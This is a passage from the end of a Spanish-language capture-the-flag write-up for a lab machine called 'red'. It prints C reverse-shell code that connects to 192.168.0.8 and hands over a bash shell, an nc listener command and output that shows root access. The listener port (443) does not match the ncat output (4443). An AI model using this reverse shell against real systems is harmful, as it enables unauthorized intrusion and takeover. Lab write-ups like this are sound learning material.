struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("192.168.0.8");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execvp("/bin/bash", argv);
return 0;
}
Luego esperamos la conexion con nc, y ejecutamos el rev nuevo. Que al parecer lo va compilando cada cierto tiempo.
nc -nlvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 192.168.0.14.
Ncat: Connection from 192.168.0.14:54452.
root@red:/var/www/wordpress/.git$ whoami
root
root@red:/var/www/wordpress/.git$
Conclusiones
La verdad una maquina bastante interesante, algo unico que veo esto de que cada tanto se cierre la shell entre otras cosas molestas que vas encontrando a medida que haces la maquina, pero vimos muchas tecnias y cosas interesantes.
Ya saben cualquier duda o consulta, pueden usar la seccion de comentarios o contactarme por disc #Varovish/varovish.
Subscribe to my newsletter
Read articles from Dh89 directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Dh89
Dh89
Soy un entusiasta de la ciberseguridad,disc -> Varovish/varovish